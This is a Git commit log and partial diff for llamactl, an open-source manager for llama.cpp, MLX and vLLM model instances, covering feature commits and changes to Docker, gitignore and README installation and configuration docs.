214 Commits

Author SHA1 Message Date
34edb8a2e5 Merge pull request #78 from lordmathis/feat/inflight-requests
feat: Wait for inflight requests to finish before shutting down an instance
2025-10-30 18:08:55 +01:00
560850f86d Add shutdown state checks in HTTP handlers 2025-10-30 18:00:59 +01:00
c340439306 Add support for 'shutting_down' state in HealthBadge and health service 2025-10-29 00:09:18 +01:00
77c0e22fd0 Use instance's ServeHTTP in handlers 2025-10-29 00:01:29 +01:00
d65c5ab717 Wait for inflight requests before stopping 2025-10-29 00:00:56 +01:00
2b94244c8a Replace GetProxy with ServeHttp in instance 2025-10-29 00:00:02 +01:00
2e5644db53 Implement inflight request tracking 2025-10-28 23:59:02 +01:00
7ee22fee51 Implement shutting down status 2025-10-28 23:53:11 +01:00
e5baedb776 Merge pull request #76 from lordmathis/feat/import-export
feat: Add support for instance import and export on frontend
2025-10-27 20:46:48 +01:00
e6205b930e Document import and export features 2025-10-27 20:44:28 +01:00
f9eb424690 Fix concurrent map write issue in MarshalJSON by initializing BackendOptions 2025-10-27 20:36:42 +01:00
5b84b64623 Fix some typescript issues 2025-10-27 20:36:31 +01:00
7813a5f2be Move import instance configuration to InstanceDialog component 2025-10-27 20:17:18 +01:00
a00c9b82a6 Add import functionality for instance configuration from JSON file 2025-10-27 20:11:22 +01:00
cbfa6bd48f Fix export functionality to exclude computed field from JSON output 2025-10-27 19:59:43 +01:00
bee0f72c10 Add export functionality to InstanceCard component 2025-10-27 19:55:07 +01:00
a5d8f541f0 Merge pull request #75 from lordmathis/fix/delete-instance
fix: Prevent restarting instance from getting deleted
2025-10-27 19:27:58 +01:00
dfcc16083c Update test configuration to use 'sh -c "sleep 999999"' command 2025-10-27 19:25:13 +01:00
6ec2919049 Fix instance start simulation in TestUpdateInstance 2025-10-27 19:14:54 +01:00
d6a6f377fc Fix logger race condition 2025-10-27 19:06:06 +01:00
cd9a71d9fc Update test configuration to use 'yes' command instead of 'sleep' 2025-10-27 18:54:20 +01:00
2c4cc5a69a Fix manager tests 2025-10-27 18:47:17 +01:00
b1fc1d2dc8 Add InstancesDir to test configuration for instance management 2025-10-27 18:38:23 +01:00
08c47a16a0 Fix operations tests 2025-10-27 18:35:16 +01:00
219db7abce Move port range validation to config 2025-10-27 18:23:49 +01:00
14131a6274 Remove redundant code 2025-10-27 18:18:25 +01:00
e65f4f1641 Remove unsupported error wrapping from log.Printf 2025-10-27 18:01:58 +01:00
5ef0654cdd Use %w for error wrapping in log messages across multiple files 2025-10-27 17:54:39 +01:00
1814772fa2 Fix instance deletion check to account for restarting status 2025-10-27 17:42:27 +01:00
f1666565d8 Merge pull request #74 from lordmathis/refactor/health-check
refactor: Improve frontend health check
2025-10-26 19:54:38 +01:00
13ef13449c Fix ts type check 2025-10-26 19:52:44 +01:00
777e07752b Fix health service tests 2025-10-26 19:48:07 +01:00
75e7b628ca Remove 'loading' and 'error' states 2025-10-26 19:12:35 +01:00
2a1bebeb24 Improve health checks for instances 2025-10-26 19:05:03 +01:00
f94d05dad2 Add Restarting state 2025-10-26 18:55:05 +01:00
14f4a80c89 Merge pull request #73 from lordmathis/refactor/docs
refactor: Update docs structure and improve content clarity
2025-10-26 17:30:50 +01:00
d768845805 Add Authorization header to curl examples. 2025-10-26 17:28:01 +01:00
4f94f63de3 Minor docs improvements 2025-10-26 17:19:53 +01:00
249ff2a7aa Capitalize godoc tags 2025-10-26 16:49:27 +01:00
6c522a2199 Add core concepts to quick-start 2025-10-26 16:44:32 +01:00
3ff87f24bd Update swagger docs 2025-10-26 16:36:24 +01:00
eac4f834c0 Update API endpoints in managing instances and quick start documentation 2025-10-26 16:35:58 +01:00
59c954811d Update API routes in godoc 2025-10-26 16:35:42 +01:00
dd40b153d8 Minor docs improvements 2025-10-26 16:10:37 +01:00
c0cd03c75d Refactor troubleshooting documentation for instance management issues 2025-10-26 15:59:17 +01:00
6a840069e1 Fix llama.cpp link in troubleshooting docs 2025-10-26 15:35:51 +01:00
7509722dfa Clarify port and api key assignments 2025-10-26 15:32:40 +01:00
a5e9e01ff4 Update screenshots 2025-10-26 15:25:53 +01:00
7063e83cd2 Improve OpenAPI docs styling 2025-10-26 15:00:30 +01:00
781921fc5a Refactor documentation headings 2025-10-26 14:50:42 +01:00
85e21596d9 Auto generate mkdocs api reference from swagger 2025-10-26 14:43:27 +01:00
975c740272 Add API key security definitions to Swagger documentation 2025-10-26 14:42:55 +01:00
e387280405 Update docs path in contributing 2025-10-26 14:41:59 +01:00
58c8899fd9 Update import path for API documentation 2025-10-26 14:08:48 +01:00
f98b09ea78 Move apidocs to docs folder 2025-10-26 14:04:53 +01:00
90b65cad79 Update docs navigation 2025-10-26 13:57:16 +01:00
9e88b63fca Flatten the docs structure 2025-10-26 13:55:05 +01:00
52d8c2a082 Simplify README.md 2025-10-26 13:43:44 +01:00
108a977a9c Merge pull request #72 from lordmathis/refactor/handlers
refactor: Extract common helper functions in API handlers
2025-10-26 12:07:42 +01:00
969fee837f Fix instance name retrieval 2025-10-26 11:34:45 +01:00
4e587953d8 Refactor llama server command handlers to use a common execution function 2025-10-26 11:00:10 +01:00
356c5be2c6 Improve comments 2025-10-26 10:34:36 +01:00
836e918fc5 Rename ProxyToInstance to InstanceProxy for clarity in routing 2025-10-26 10:22:37 +01:00
a7593e9a58 Split LlamaCppProxy handler 2025-10-26 10:21:40 +01:00
9259763054 Add getInstance method to handlers 2025-10-26 09:54:24 +01:00
94dce4c9bb Implement helper response handling functions 2025-10-26 00:12:33 +02:00
a3f9213f04 Implement ensureInstanceRunning helper 2025-10-25 23:44:21 +02:00
de5a38e7fd Refactor command parsing 2025-10-25 20:23:08 +02:00
ea6c76cc96 Update multi valued flags in backends 2025-10-25 19:02:46 +02:00
bd6436840e Implement common ParseCommand interface 2025-10-25 18:41:46 +02:00
0a7420c9f9 Merge pull request #71 from lordmathis/refactor/proxy
refactor: Move all proxy handling to instance package
2025-10-25 16:32:32 +02:00
c038aac91b Remove redundant UpdateLastRequestTime calls 2025-10-25 16:09:57 +02:00
7d9b983f93 Don't strip remote llama-cpp proxy prefix 2025-10-25 16:02:09 +02:00
889df3cb79 Add API key header for remote instances in proxy build 2025-10-25 14:14:39 +02:00
ff719f3ef9 Remove remote instance proxy handling from handlers 2025-10-25 14:07:11 +02:00
6a973fae2d Fix tests 2025-10-25 00:14:42 +02:00
58f8861d17 Switch manager to global app config 2025-10-25 00:14:12 +02:00
eff59a86fd Remove proxy, logger and process init from UnmarshalJSON 2025-10-24 23:41:33 +02:00
174d1772d6 Implement remote proxy handling in instance 2025-10-24 23:16:45 +02:00
4bbf45f0b9 Merge pull request #70 from lordmathis/refactor/manager
refactor: Split instance manager into single focus structs
2025-10-22 20:21:15 +02:00
a9fb0d613d Validate instance name in openai proxy 2025-10-22 18:55:57 +02:00
3b8bc658e3 Add name validation to backend handlers 2025-10-22 18:50:51 +02:00
c6053f6afd Remove old validation tests 2025-10-22 18:50:38 +02:00
c794e4f98b Move instance name validation to handlers 2025-10-22 18:40:39 +02:00
0f2c14d3ed Validate instance names to prevent injection attacks 2025-10-22 00:02:23 +02:00
13f3bed5fe Add URL encoding for instance name in API calls in webui 2025-10-21 23:36:26 +02:00
7c2c02ab2f Use url escape instead for instance name param 2025-10-21 23:24:27 +02:00
e0289ff42f Add instance name validation for URL safety and corresponding tests 2025-10-21 23:16:20 +02:00
bc025bbe28 Fix instance name validation 2025-10-21 22:57:23 +02:00
c6ebe47511 Fix path validation false positive 2025-10-21 22:47:41 +02:00
9bb106a1ce Remove deprecated operation mutex in instanceManager 2025-10-21 22:38:00 +02:00
bac18b5626 Unexport factory functions 2025-10-21 22:37:10 +02:00
2b51b4a47f Simplify manager tests 2025-10-21 22:30:08 +02:00
c44712e813 Remove redundant instance manager tests 2025-10-21 22:15:12 +02:00
6afe120a0e Implement more manager tests 2025-10-21 22:07:10 +02:00
4d05fcea46 Improve manager tests 2025-10-21 21:39:01 +02:00
7c64ab9cc6 Make StartInstance and StopInstance idempotent 2025-10-21 18:49:49 +02:00
62c431a041 Merge pull request #69 from lordmathis/dependabot/npm_and_yarn/webui/npm_and_yarn-fd296dbd23
Bump vite from 7.1.5 to 7.1.11 in /webui in the npm_and_yarn group across 1 directory
2025-10-21 18:40:46 +02:00
dependabot[bot]
e5f1b7c056 Bump vite in /webui in the npm_and_yarn group across 1 directory
Bumps the npm_and_yarn group with 1 update in the /webui directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).


Updates `vite` from 7.1.5 to 7.1.11
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v7.1.11/packages/vite)

---
updated-dependencies:
- dependency-name: vite
  dependency-version: 7.1.11
  dependency-type: direct:development
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
2025-10-21 00:23:03 +00:00
a2d4622486 Refactor instance locking mechanism to use per-instance locks for concurrency 2025-10-20 22:59:31 +02:00
d923732aba Delete unused code 2025-10-20 22:27:22 +02:00
1ae28a0b09 Unexport member struct methods 2025-10-20 22:22:09 +02:00
c537bc48b8 Refactor API path handling in remoteManager to use a constant for base path 2025-10-20 22:00:06 +02:00
ffb4b49c94 Split manager into multiple structs 2025-10-20 21:55:50 +02:00
91d956203d Merge pull request #68 from lordmathis/refactor/backend-options
refactor: Move all backend type switching to backends package
2025-10-19 21:04:09 +02:00
b25ad48605 Refactor backend options marshaling/unmarshaling 2025-10-19 20:48:05 +02:00
d8e0da9cf8 Refactor backend options to implement common interface and streamline validation 2025-10-19 20:36:57 +02:00
f42f000539 Implement mlx and cllm tests and remove redundant code 2025-10-19 19:45:31 +02:00
72fe780e31 Simplify instance tests 2025-10-19 19:14:32 +02:00
55a9450077 Fix instance tests 2025-10-19 19:08:38 +02:00
72586fc627 Simplify config tests 2025-10-19 19:06:06 +02:00
6a91fe13e0 Fix local node override tests 2025-10-19 18:59:59 +02:00
51a7ac590e Fix preventing local proxy usage for remote instances 2025-10-19 18:55:56 +02:00
82f4f7beed Ensure local node is defined in LoadConfig by adding default config if missing 2025-10-19 18:47:02 +02:00
ec65ba8968 Add debug files to .gitignore 2025-10-19 18:39:46 +02:00
867380a06d Remove GetBackendSettings method from config 2025-10-19 18:32:05 +02:00
3500971f03 Fix JSON marshaling of backend options by using a pointer 2025-10-19 18:27:22 +02:00
9da2433a7c Refactor instance and manager tests to use BackendOptions structure 2025-10-19 18:07:14 +02:00
55f671c354 Refactor backend options handling and validation 2025-10-19 17:41:08 +02:00
2a7010d0e1 Flatten backends package structure 2025-10-19 15:50:42 +02:00
f209bc88b6 Update .gitignore and launch configuration for dev environment 2025-10-19 15:50:30 +02:00
3fffcc5b37 Merge pull request #67 from lordmathis/refactor/instance-split
refactor: Split instance struct into status, options, logger, proxy and process for better maintenance
2025-10-18 13:23:50 +02:00
851c73f058 Add tests for status change callback and options preservation 2025-10-18 13:19:01 +02:00
8ac4b370c9 Unexport struct methods 2025-10-18 11:25:26 +02:00
a7740000d2 Refactor instance creation to initialize logger, proxy, and process only for local instances 2025-10-18 10:39:04 +02:00
b13f8c471d Split off process struct 2025-10-18 10:28:15 +02:00
3f834004a8 Rename NewInstance to New 2025-10-18 00:34:18 +02:00
113b51eda2 Refactor instance node handling to use a map 2025-10-18 00:33:16 +02:00
7bf0809122 Fix test compilation after merge
Update instance tests to use correct type names:
- CreateInstanceOptions -> Options
- InstanceStatus -> Status

🤖 Generated with [Claude Code](https://claude.ai/code)

Co-Authored-By: Claude <noreply@anthropic.com>
2025-10-17 00:13:53 +02:00
a1ffdb02a4 Merge main into refactor/instance-split
Resolved conflicts in:
- pkg/instance/instance.go: Combined remote detection logic from main with refactored structure
- pkg/manager/manager_test.go: Updated manager initialization to include localNodeName parameter
- pkg/manager/remote_ops.go: Removed stripNodesFromOptions function that was deleted in main
- pkg/manager/remote_ops_test.go: Removed file that was deleted in main

🤖 Generated with [Claude Code](https://claude.ai/code)

Co-Authored-By: Claude <noreply@anthropic.com>
2025-10-17 00:10:09 +02:00
eb5abae173 Merge pull request #66 from lordmathis/fix/disable-node-edit
fix: Prevent node change on update
2025-10-16 22:37:59 +02:00
696a2cb18b Prevent node change on update 2025-10-16 22:35:29 +02:00
e7402f0029 Merge pull request #65 from lordmathis/fix/local-node
fix: Detect local instances based on local node in nodes array
2025-10-16 22:28:01 +02:00
5c9a397746 Fix get local proxy 2025-10-16 22:11:29 +02:00
e97ca727d1 Clarify node configuration in docs 2025-10-16 21:50:06 +02:00
9f3c01384b Remove stripNodesFromOptions function 2025-10-16 21:29:27 +02:00
c5097e59be Fix local instance detection 2025-10-16 21:26:04 +02:00
4b30791be2 Refactor instance options structure and related code 2025-10-16 20:53:24 +02:00
a96ed4d797 Fix status json tag static check 2025-10-16 20:22:12 +02:00
5afc22924f Refactor Status struct 2025-10-16 20:15:22 +02:00
e0ec00d141 Remove redundant instance prefix from status 2025-10-16 19:40:03 +02:00
80ca0cbd4f Rename Process to Instance 2025-10-16 19:38:44 +02:00
964c6345ef Refactor backend host/port retrieval and remove redundant code for health checks 2025-10-14 22:16:26 +02:00
92a76bc84b Move proxy to separate struct 2025-10-14 22:01:09 +02:00
02909c5153 Remove redundant instance prefix from logger 2025-10-14 19:46:43 +02:00
ef3478e2a3 Move logging to separate struct 2025-10-14 19:32:15 +02:00
cf20f304b3 Merge pull request #61 from lordmathis/fix/docs-formatting
fix: Add MkDocs hook to fix line endings in markdown files
2025-10-09 23:28:09 +02:00
72eba48b80 Add MkDocs hook to fix line endings in markdown files 2025-10-09 23:23:17 +02:00
c3037f914d Merge pull request #60 from lordmathis/lordmathis-patch-1
Update docs.yaml
2025-10-09 22:31:38 +02:00
81266b4bc4 Update docs.yaml 2025-10-09 22:29:23 +02:00
a31af94e7b Merge pull request #59 from lordmathis/feat/multi-host
feat: Implement multi node support
2025-10-09 22:23:27 +02:00
9ee0a184b3 Re-validate instance name in DeleteInstance for improved security 2025-10-09 22:18:53 +02:00
5436c28a1f Add instance name validation before deletion for security 2025-10-09 22:10:40 +02:00
73b9dd5bc7 Rename workflows for consistency 2025-10-09 21:53:14 +02:00
f61e8dad5c Add User Docs badge to README 2025-10-09 21:51:38 +02:00
ab2770bdd9 Add documentation for remote node deployment and configuration 2025-10-09 21:50:39 +02:00
e7a6a7003e Skip remote instances in checkAllTimeouts and EvictLRUInstance methods 2025-10-09 21:13:38 +02:00
2b950ee649 Implement updateLocalInstanceFromRemote to preserve Nodes field when syncing remote instance data 2025-10-09 20:39:21 +02:00
b965b77c18 Prevent remote instances from using local proxy in GetProxy method 2025-10-09 20:24:54 +02:00
8a16a195de Fix getting remote instance logs 2025-10-09 20:22:32 +02:00
9684a8a09b Enhance instance management to preserve local state for remote instances 2025-10-09 19:34:52 +02:00
9d5f01d4ae Auto-select first node in InstanceSettingsCard if none is selected 2025-10-09 19:13:58 +02:00
e281708b20 Enhance auto-start logic to differentiate between remote and local instances 2025-10-09 18:56:23 +02:00
8d9b0c0621 Initialize timeProvider and logger in UnmarshalJSON for Process 2025-10-09 18:56:12 +02:00
6c1a76691d Improve cleanup of options in InstanceDialog to skip empty strings and arrays 2025-10-09 18:49:36 +02:00
5d958ed283 Fix backend_options cleanup to exclude empty arrays in InstanceDialog 2025-10-09 18:38:33 +02:00
56b95d1243 Refactor InstanceSettingsCard and API types to use NodesMap 2025-10-08 19:52:39 +02:00
688b815ca7 Add LocalNode configuration 2025-10-08 19:43:53 +02:00
7f6725da96 Refactor NodeConfig handling to use a map 2025-10-08 19:24:24 +02:00
3418735204 Add stripNodesFromOptions function to prevent routing loops in remote requests 2025-10-07 20:27:31 +02:00
2f1cf5acdc Refactor CreateRemoteInstance and UpdateRemoteInstance to directly use options parameter in API requests 2025-10-07 19:57:21 +02:00
01380e6641 Update instance manager tests to use empty NodeConfig slice 2025-10-07 19:18:13 +02:00
6298b03636 Refactor RemoteOpenAIProxy to use cached proxies and restore request body handling 2025-10-07 18:57:08 +02:00
aae3f84d49 Implement caching for remote instance proxies and enhance proxy request handling 2025-10-07 18:44:23 +02:00
554796391b Remove test config file 2025-10-07 18:05:30 +02:00
16b28bac05 Merge branch 'main' into feat/multi-host 2025-10-07 18:04:24 +02:00
1892dc8315 Merge pull request #57 from BobbyL2k/feat/llama-cpp-proxy
feat: Proxy llama.cpp API endpoints via `/llama-cpp/{name}/`
2025-10-06 20:23:44 +02:00
Anuruth Lertpiya
997bd1b063 Changed status code to StatusBadRequest (400) if requested invalid model name. 2025-10-05 14:53:20 +00:00
Anuruth Lertpiya
fa43f9e967 Added support for proxying llama.cpp native API endpoints via /llama-cpp/{name}/ 2025-10-05 14:28:33 +00:00
db9eebeb8b Merge pull request #56 from lordmathis/fix/body-already-read
Fix double read of json response when content-length header is missing
2025-10-04 22:28:22 +02:00
bd062f8ca0 Mock Response.clone for tests 2025-10-04 22:22:25 +02:00
8ebdb1a183 Fix double read of json response when content-length header is missing 2025-10-04 22:16:28 +02:00
7272212081 Merge pull request #55 from lordmathis/fix/auto-restart
fix: Set status to Stopped for instances with auto-restart disabled
2025-10-04 21:45:12 +02:00
035e184789 Merge branch 'main' into fix/auto-restart 2025-10-04 21:22:50 +02:00
d15976e7aa Implement auto-stop for instances with auto-restart disabled and add corresponding tests 2025-10-04 21:17:55 +02:00
4fa75d9801 Merge pull request #52 from BobbyL2k/feat/config-cors-headers
feat: Added support for configuring access-control-request-headers for CORS
2025-10-04 20:45:27 +02:00
Anuruth Lertpiya
0e1bc8a352 Added support for configuring CORS headers 2025-10-04 09:13:40 +00:00
b728a7c6b2 Fix fetchNodes call to ensure proper handling of promise 2025-10-03 10:53:29 +02:00
a491f29483 Add node selection functionality to InstanceSettingsCard and define Node API 2025-10-02 23:18:33 +02:00
670f8ff81b Split up handlers 2025-10-02 23:11:20 +02:00
da56456504 Add node management endpoints to handle listing and retrieving node details 2025-10-02 22:51:41 +02:00
c30053e51c Enhance instance loading to support remote instances and handle node configuration 2025-10-01 22:59:45 +02:00
347c58e15f Enhance instance manager to persist remote instances and update tracking on modifications 2025-10-01 22:58:57 +02:00
2ed67eb672 Add remote instance proxying functionality to handler 2025-10-01 22:17:19 +02:00
0188f82306 Implement remote instance creation and deletion in instance manager 2025-10-01 22:05:18 +02:00
e0f176de10 Enhance instance manager to support remote instance management and update related tests 2025-10-01 20:25:06 +02:00
2759be65a5 Add remote instance management functionality and configuration support 2025-09-30 21:09:05 +02:00
1e5e86d2c3 Merge pull request #50 from lordmathis/feat/docker-image
feat: Add Dockerfiles for running llamactl in docker
2025-09-29 21:26:23 +02:00
25d3d70707 Update README and installation guide to reflect Dockerfile paths and add source build instructions 2025-09-29 21:18:13 +02:00
e54cfd006d Add Dockerfile for building from source 2025-09-29 21:17:40 +02:00
7d39e7ee86 Move docker stuff to a dedicated folder 2025-09-29 21:16:51 +02:00
222d913b4a Merge pull request #49 from BobbyL2k/feat/reverse-proxy-support
Added support for serving behind a reverse proxy
2025-09-29 20:32:11 +02:00
Anuruth Lertpiya
03a7a5d139 Update configuration.md with reverse proxy related information 2025-09-29 13:54:15 +00:00
Anuruth Lertpiya
e50660c379 Fixed broken webui tests 2025-09-29 13:38:24 +00:00
Anuruth Lertpiya
5906d89f8d Added support for serving behind a reverse proxy
- Added support for specifying response headers for each backend
  - Allowing users to set `X-Accel-Buffering: no` to disable buffering for streaming responses in nginx
  - Updated `configuration.md` to document the new configuration options
- Modified Vite config to build with `base: "./"`, making assets be accessed via relative paths
- Updated API_BASE to use `document.baseURI`, allowing API calls to be made relative to the base path
2025-09-29 12:43:10 +00:00
cb2d95139f Setup data dir in Docker and docker-compose 2025-09-28 22:17:38 +02:00
889a8707e7 Refactor Dockerfile and docker-compose to streamline environment variable configuration and remove redundant commands 2025-09-28 22:17:38 +02:00
070c91787d Add environment variable for llamactl command in Dockerfile 2025-09-28 22:17:38 +02:00
169ee422ec Update README and installation guide to clarify Docker support and CUDA configuration 2025-09-28 22:17:38 +02:00
bb0176b7f5 Update Dockerfile to use server-cuda image for improved performance 2025-09-28 22:17:38 +02:00
291ec7995f Update Docker run commands to use cached directories and remove unnecessary environment variables 2025-09-28 22:17:38 +02:00
b940b38e46 Initial support for docker 2025-09-28 22:17:38 +02:00
92cb57e816 Merge pull request #48 from lordmathis/fix/command-environment
fix: Pass host environment to instances
2025-09-28 21:40:50 +02:00
0ecd55c354 Start with host environment for instances 2025-09-28 21:37:48 +02:00
101 changed files with 11506 additions and 5734 deletions

45
.dockerignore Normal file
View File

@@ -0,0 +1,45 @@
# Git and version control
.git/
.gitignore
# Documentation
*.md
docs/
# Development files
.vscode/
.idea/
# Build artifacts
webui/node_modules/
webui/dist/
webui/.next/
*.log
*.tmp
# Data directories
data/
models/
logs/
# Test files
*_test.go
**/*_test.go
# CI/CD
.github/
# Local configuration
llamactl.yaml
config.yaml
.env
.env.local
# OS files
.DS_Store
Thumbs.db
# Backup files
*.bak
*.backup
*~

View File

@@ -1,4 +1,4 @@
name: Build and Deploy Documentation
name: User Docs
on:
push:

10
.gitignore vendored
View File

@@ -34,4 +34,12 @@ go.work.sum
node_modules/
dist/
__pycache__/
__pycache__/
site/
# Dev config
llamactl.dev.yaml
# Debug files
__debug*

2
.vscode/launch.json vendored
View File

@@ -12,7 +12,7 @@
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
"LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml"
},
}
]

View File

@@ -86,7 +86,7 @@ go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
swag init -g cmd/server/main.go
```
## Pull Request Guidelines

179
README.md
View File

@@ -1,108 +1,35 @@
# llamactl
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg) ![User Docs](https://github.com/lordmathis/llamactl/actions/workflows/docs.yaml/badge.svg)
**Unified management and routing for llama.cpp, MLX and vLLM models with web dashboard.**
## Features
### 🚀 Easy Model Management
- **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
- **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
- **State Persistence**: Ensure instances remain intact across server restarts
### 🔗 Universal Compatibility
- **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Support**: Run backends in containers
### 🌐 User-Friendly Interface
- **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
- **API Key Authentication**: Separate keys for management vs inference access
### ⚡ Smart Operations
- **Instance Monitoring**: Health checks, auto-restart, log management
- **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
- **Environment Variables**: Set custom environment variables per instance for advanced configuration
📚 **[Full Documentation →](https://llamactl.org)**
![Dashboard Screenshot](docs/images/dashboard.png)
## Features
**🚀 Easy Model Management**
- **Multiple Models Simultaneously**: Run different models at the same time (7B for speed, 70B for quality)
- **Smart Resource Management**: Automatic idle timeout, LRU eviction, and configurable instance limits
- **Web Dashboard**: Modern React UI for managing instances, monitoring health, and viewing logs
**🔗 Flexible Integration**
- **OpenAI API Compatible**: Drop-in replacement - route requests to different models by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Ready**: Run backends in containers with full GPU support
**🌐 Distributed Deployment**
- **Remote Instances**: Deploy instances on remote hosts
- **Central Management**: Manage everything from a single dashboard with automatic routing
## Quick Start
```bash
# 1. Install backend (one-time setup)
# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
# For MLX on macOS: pip install mlx-lm
# For vLLM: pip install vllm
# Or use Docker - no local installation required
# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# 3. Start the server
llamactl
# Access dashboard at http://localhost:8080
```
## Usage
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Set model path and backend-specific options
5. Configure environment variables if needed (optional)
6. Start or stop the instance
### Or use the REST API:
```bash
# Create llama.cpp instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
# Create MLX instance (macOS)
curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
# Create vLLM instance with environment variables
curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}, "environment": {"CUDA_VISIBLE_DEVICES": "0,1", "NCCL_DEBUG": "INFO"}}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
-H "Authorization: Bearer your-key" \
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```
## Installation
### Option 1: Download Binary (Recommended)
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
1. Install a backend (llama.cpp, MLX, or vLLM) - see [Prerequisites](#prerequisites) below
2. [Download llamactl](#installation) for your platform
3. Run `llamactl` and open http://localhost:8080
4. Create an instance and start inferencing!
## Prerequisites
@@ -147,9 +74,9 @@ pip install vllm
# Or use Docker - no local installation required
```
## Docker Support
### Docker Support
llamactl supports running backends in Docker containers - perfect for production deployments without local backend installation. Simply enable Docker in your configuration:
llamactl can run backends in Docker containers, eliminating the need for local backend installation:
```yaml
backends:
@@ -161,9 +88,58 @@ backends:
enabled: true
```
**Requirements:** Docker installed and running. For GPU support: nvidia-docker2 (Linux) or Docker Desktop with GPU support.
## Installation
For detailed Docker configuration options, see the [Configuration Guide](docs/getting-started/configuration.md).
### Option 1: Download Binary (Recommended)
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Docker (No local backend installation required)
```bash
# Clone repository and build Docker images
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
mkdir -p data/llamacpp data/vllm models
# Build and start llamactl with llama.cpp CUDA backend
docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
# Build and start llamactl with vLLM CUDA backend
docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
# Build from source using multi-stage build
docker build -f docker/Dockerfile.source -t llamactl:source .
```
**Note:** Dockerfiles are configured for CUDA. Adapt base images for other platforms (CPU, ROCm, etc.).
### Option 3: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
## Usage
1. Open http://localhost:8080
2. Click "Create Instance"
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Configure your model and options (ports and API keys are auto-assigned)
5. Start the instance and use it with any OpenAI-compatible client
## Configuration
@@ -174,6 +150,7 @@ server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
allowed_headers: ["*"] # Allowed CORS headers (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
@@ -184,7 +161,7 @@ backends:
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
args: ["run", "--rm", "--network", "host", "--gpus", "all", "-v", "~/.local/share/llamactl/llama.cpp:/root/.cache/llama.cpp"]
environment: {} # Environment variables for the container
vllm:
@@ -194,7 +171,7 @@ backends:
docker:
